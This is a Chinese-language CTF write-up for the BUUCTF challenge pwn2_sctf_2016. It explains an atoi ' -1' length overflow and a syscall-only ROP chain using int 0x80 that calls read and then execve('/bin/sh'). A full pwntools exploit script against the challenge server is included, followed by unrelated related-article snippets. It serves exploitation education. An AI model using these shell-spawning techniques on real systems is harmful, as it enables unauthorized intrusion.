BUUCTF pwn2_sctf_2016 int 0x80方法

本文目的

BUUCTF的PWN的第一页的pwn2_sctf_2016的libc不适用辣,但网上一搜全是libc
然后怎么办嘞,都明摆着有个int 0x80,当然是用啊
所以水一篇

早上中午晚上好

老三样,下载程序,打开ida,拖进去
一眼好几个函数
在这里插入图片描述
点开main,跟进vuln
在这里插入图片描述
在这里插入图片描述
看过get_n的朋友都知道,就跟read函数差不了多少,第一个参数是地址,第二是允许输入的最多字节数
后面又接了个atoi,众所周知(不知道的可以现在知),当atoi读入 ’ -1’ (有个空格)后会转化为……一个好大的数(反正能溢出就对了)
然后就能溢出了

还有个do_thing

在这里插入图片描述
看一眼汇编,就是个int 0x80,记下地址0x080484d0
在这里插入图片描述
那目标明确,奔着 execve(‘/bin/sh’, 0, 0) 去的

e?x控制

rgg看一眼都有啥,就不用–only了,光是pop和ret显然不够

ROPgadget --binary pwn2_sctf_2016

还挺长,我们挑重点
一堆inc可以用于自增,相当于e?x++
在这里插入图片描述
有个ecx*2也拿着,这样ecx通过*2和+1可以到达任何数
在这里插入图片描述
这就……没了?!那还玩个毛线,不是还应该有abd才对吗
那就看ida汇编(找呗
这不是有一串嘛,正好eax=0之后就ret,相当于mov eax, 0; ret
在这里插入图片描述
edx类似
在这里插入图片描述
差个ebx,心心念念的pop它来辣(没想到吧,还有有用滴,pop这么好用,当然是第一个查的啦
在这里插入图片描述

差点东西,/bin/sh在哪里

eabcdx都可控,又有个int 0x80,read一下
read调用设置:

  • eax = 3,这是32位系统的调用号,64位的是0,参考这里
  • ebx = 0
  • ecx = 一个可写且可知的地址,比如bss
  • edx = len(你要写的东西的长度,/bin/sh为7)

根据上面得到的指令地址

  • 可以通过mov和inc控制eax和edx
  • ebx不能直接pop给0,不然会被get_n截断,所以先pop给0xffffffff,然后inc一次得到ebx=0
  • 对于ecx,现在有*2和+1能用,而*2相当于左移一位,32位系统直接移它个32位必为0,不论ecx的初始值,直接add ecx, ecx32次得到ecx=0,最后通过*2和+1再结合一点玄学(bushi,当然数学)就可以把ecx设置成一个已知的可写的地址(这里是bss)
  • 最后int 0x80执行read
pl=b'a'*(0x2c+4)
pl+=p32(mov_eax_0)+p32(inc_eax)*3#set eax=3 to syscall read
pl+=p32(pop_ebx)+p32(0xffffffff)+p32(inc_ebx)#set ebx=0 for read para1
pl+=p32(mov_edx_0)+p32(inc_edx)*7#set edx=7 for read para3 to store '/bin/sh'
pl+=p32(add_ecx_ecx)*32+p32(inc_ecx)*2#set init ecx=2, and the times of add_ecx_ecx is at least 32
pl+=p32(add_ecx_ecx)*8+p32(inc_ecx)+p32(add_ecx_ecx)*3+p32(inc_ecx)+p32(add_ecx_ecx)*2+p32(inc_ecx)+p32(add_ecx_ecx)*7+p32(inc_ecx)+p32(add_ecx_ecx)*6#set ecx=0x0804A040(bss addr) for read para2
pl+=p32(int80)#syscall read -> read(0, bss_addr, 7)

execve(系统调用号为11=0xb)

在调用完read之后,eax的值会被改成read读入的字节数(这里是7),所以只需要inc再加4次就有eax=0xb
当然也可以不用管,mov之后再inc到11也是可以的

#eax=7 after sys_read
pl+=p32(inc_eax)*4#set eax=0xb(11) to syscall execve
pl+=p32(pop_ebx)+p32(0x0804A040)#set ebx point at addr of '/bin/sh' for execve para1
pl+=p32(add_ecx_ecx)*32#set ecx=0 for execve para2
pl+=p32(mov_edx_0)#set edx=0 for execve para3
pl+=p32(int80)#syscall execve -> execve('/bin/sh', 0, 0)

最后怎么帅怎么来

  • 可以写一个自动写入/bin/sh的一行代码
  • 也可以自己从键盘敲,真是太有终端交互辣

完整exp

为什么明明说了不用libc而exp里还有个LibcSearcher呢?(明明说的又不是我说的关我屁事
因为试过了,然后懒得删

from pwn import *
from LibcSearcher import LibcSearcher#context(os='linux', arch='amd64', log_level='debug')
#
context(os='linux', arch='i386', log_level='debug')
#io = process('./pwn2_sctf_2016')
#
io = connect('node5.buuoj.cn',29592)
elf=ELF('./pwn2_sctf_2016')
#gdb.attach(io)def rl():io.recvline()
def ru(s):io.recvuntil(s)
def sl(s):io.sendline(s)
def sd(s):io.send(s)def plt(s):return elf.plt[s]
def got(s):return elf.got[s]ru('read? ')
sl(' -1')ru('data!\n')
int80=0x080484d0inc_eax=0x080484d3
inc_ebx=0x080484d5
inc_ecx=0x080484d7
inc_edx=0x080484d9mov_eax_0=0x08048420
pop_ebx=0x0804835d
add_ecx_ecx=0x0804849a#to control ecx point bss addr
mov_edx_0=0x08048459pl=b'a'*(0x2c+4)
pl+=p32(mov_eax_0)+p32(inc_eax)*3#set eax=3 to syscall read
pl+=p32(pop_ebx)+p32(0xffffffff)+p32(inc_ebx)#set ebx=0 for read para1
pl+=p32(mov_edx_0)+p32(inc_edx)*7#set edx=7 for read para3 to store '/bin/sh'
pl+=p32(add_ecx_ecx)*32+p32(inc_ecx)*2#set init ecx=2, and the times of add_ecx_ecx is at least 32
pl+=p32(add_ecx_ecx)*8+p32(inc_ecx)+p32(add_ecx_ecx)*3+p32(inc_ecx)+p32(add_ecx_ecx)*2+p32(inc_ecx)+p32(add_ecx_ecx)*7+p32(inc_ecx)+p32(add_ecx_ecx)*6#set ecx=0x0804A040(bss addr) for read para2
pl+=p32(int80)#syscall read -> read(0, bss_addr, 7)
#eax=7 after sys_read
pl+=p32(inc_eax)*4#set eax=0xb(11) to syscall execve
pl+=p32(pop_ebx)+p32(0x0804A040)#set ebx point at addr of '/bin/sh' for execve para1
pl+=p32(add_ecx_ecx)*32#set ecx=0 for execve para2
pl+=p32(mov_edx_0)#set edx=0 for execve para3
pl+=p32(int80)#syscall execve -> execve('/bin/sh', 0, 0)
sl(pl)
# 下面两句不要也行,不过要在终端自己先输入/bin/sh(主打一个帅~
sleep(1)
sd('/bin/sh')#write '/bin/sh' to bss#
io.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/13872.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

如何构建一个功能强大的低代码平台网站?关键步骤与技巧全解析

随着数字化转型的加速,企业对敏捷开发和快速迭代的需求越来越迫切。低代码平台应运而生,成为连接业务需求和技术实现的重要桥梁。低代码平台不仅能够大幅降低技术门槛,还能够通过可视化界面和预配置组件简化开发流程,帮助企业快速…

Unity图形学之Shader2.0 模板测试

1.模版测试:符合条件的 通过 不符合条件的 像素 丢弃 比较公式: if((referenceValue&readMask) comparisonFunction (stencilBufferValue&readMask)) 通过像素 else 抛弃…

RK3588 快速上手

1、资料介绍 我的开发板是临滴科技的LKD3588,相关的官网上都可以找到,我这里给大家一个网盘链接 LKD3588-开发板(公开资料) https://pan.baidu.com/s/1snYcWY-S4rLMCE_3nGlHrw?pwd3588 LKD3588-开发板(保密资料&…

STM32完全学习——点亮LED灯

一、寄存器描述 首先我们知道STM32对外设的操作,是靠对寄存器的设置来完成的。因此我们想要点亮LED灯,就需要知道端口的控制寄存器,然后给寄存器设置不同的值就可以让端口来输出0或1,首先我这里使用的是GPIOA这个端口的0-8位来做…

【Python】如何使用Python-Tkinter打造炫酷动态心形动画 !保姆级教程

文章目录 教程:从零开始,逐步实现动态心形动画环境准备第一步:导入必要的模块第二步:定义画布参数第三步:定义心形生成函数第四步:实现点的散布与收缩第五步:定义曲线函数第六步:创建…

基于SSM的“家政预约管理系统”的设计与实现(源码+数据库+文档+PPT)

基于SSM的“家政预约管理系统”的设计与实现(源码数据库文档PPT) 开发语言:Java 数据库:MySQL 技术:SSM 工具:IDEA/Ecilpse、Navicat、Maven 系统展示 家政预约管理系统功能结构图 系统首页界面 用户注册界面 家政…

MongoDB在现代Web开发中的应用

💓 博客主页:瑕疵的CSDN主页 📝 Gitee主页:瑕疵的gitee主页 ⏩ 文章专栏:《热点资讯》 MongoDB在现代Web开发中的应用 MongoDB在现代Web开发中的应用 MongoDB在现代Web开发中的应用 引言 MongoDB 概述 定义与原理 发展…

springboot企业信息管理系统,计算机毕业设计项目源码310,计算机毕设程序(LW+开题报告、中期报告、任务书等全套方案)

摘 要 传统信息的管理大部分依赖于管理人员的手工登记与管理,然而,随着近些年信息技术的迅猛发展,让许多比较老套的信息管理模式进行了更新迭代,员工信息因为其管理内容繁杂,管理数量繁多导致手工进行处理不能满足广…

【JAVA毕业设计】基于Vue和SpringBoot的周边产品销售网站

博主说明:本文项目编号 T 061 ,文末自助获取源码 \color{red}{T061,文末自助获取源码} T061,文末自助获取源码 目录 一、系统介绍二、演示录屏三、启动教程四、功能截图五、文案资料5.1 选题背景5.2 国内外研究现状5.3 可行性分析…

YOLOV8应用|排球垫球计数|附带全部数据集与源码(见文末百度云盘链接)

项目简介: 该项目旨在利用YOLOv8算法实现排球垫球动作的自动识别与计数。YOLOv8作为计算机视觉领域的先进目标检测算法,具备高精度和实时性的特点,非常适合用于体育训练和测试中的自动化计数。项目将排球垫球视频作为输入,通过YOLOv8算法检测视频中的排球及垫球动作,自动…

【工具变量】上市公司企业生产经营效率数据集(1990-2023年)

一、计算说明: 参考《数量经济技术经济研究》沈坤荣(2024)老师的研究,为了度量企业生产经营效率,选取管理费用率(manage_cost)、营运资金周转率(fund_turn)和总资产周转…

Openstack10--认证服务(Keystone)安装

在控制节点安装认证服务组件 yum -y install openstack-keystone httpd mod_wsgi 其中“openstack-keystone”是Keystone的软件包;“httpd”是阿帕奇(Apache)Web服务器的软件包名;“mod_wsgi”是使Web服务器支持WSGI的插件。 进…

从0开始学PHP面向对象内容之(常用魔术方法续二)

哈喽朋友们,I am comming,今天把剩下的常用魔术方法讲了,话不多说开始正文 常用魔术方法(续二) 一、__toString() __toString() 是 PHP 提供的一个魔术方法,用于定义对象在被转换为字符串时的行为。它在某…

CSS 技巧:如何让 div 完美填充 td 高度

引言 一天哈比比突然冒出一个毫无理头的一个问题: 本文就该问题进行展开… 原文链接: 昆仑虚F2E 一、需求说明 大致需求如下, 当然这里做了些简化 有如下初始代码: 一个自适应的表格每个单元格的宽度固定 200px每个单元格高度则是自适应每个单元格内是一个 div 标签, div 标签…

清华、国科大、智谱团队提出LongReward:利用AI反馈改进长文本大语言模型

长文本(Long-context)大模型性能的优劣,在很大程度上取决于其能否全面理解长上下文场景下的复杂信息。 然而,现有的合成有监督微调(SFT)数据由于缺少人类核验,往往会影响长文本大模型的性能&am…

2024 年 10 款替代 Postman 的工具,有免费有开源

10 款替代 Postman 的工具,有免费有开源: 工具名称支持的系统是否免费是否开源ApifoxWindows, macOS, Linux免费否Yapi无限制是是InsomniaWindows, macOS, Linux免费版付费版是Hoppscotch浏览器是是SoapUIWindows, macOS, Linux免费版付费版是Katalon S…

IDEA报包不存在,但实际存在

IDEA版本2024.2.1 现象 在IDEA里启动运行项目,报某个类有问题,引入的包不存在。 点击这个引入的包,可以看到它在左侧外部库里存在。 试过的无效方法 双击ctrl,在弹出框中mvn idea:idea在文件里,清空缓存并重启在右…

从词向量到多模态嵌入:大型语言模型的技术、应用及未来方向

索引词—大型语言模型、词嵌入、上下文嵌入、多模态表示、自然语言处理 摘要—词嵌入和语言模型通过将语言元素表示在连续向量空间中,彻底改变了自然语言处理(NLP)。本综述回顾了分布假设和上下文相似性等基础概念,追溯了从稀疏表…

超越传统:探索ONLYOFFICE的革命性办公新纪元

目录 🍁引言 🍁一、ONLYOFFICE产品简介 (一)、介绍 (二)、基本功能简介 🍁二、核心功能具体介绍 1、编辑操作 2、文本与段落: 3、样式与图形: 4、表格与图表&…

【GESP】C++一级真题(202406)luogu-B4001,立方数

2024年6月GESP一级真题。循环类问题。 题目题解详见:【GESP】C一级真题(202406)luogu-B4001,立方数 | OneCoder https://www.coderli.com/gesp-1-luogu-b4001/https://www.coderli.com/gesp-1-luogu-b4001/ C GESP专项交流频道:GESP学习交…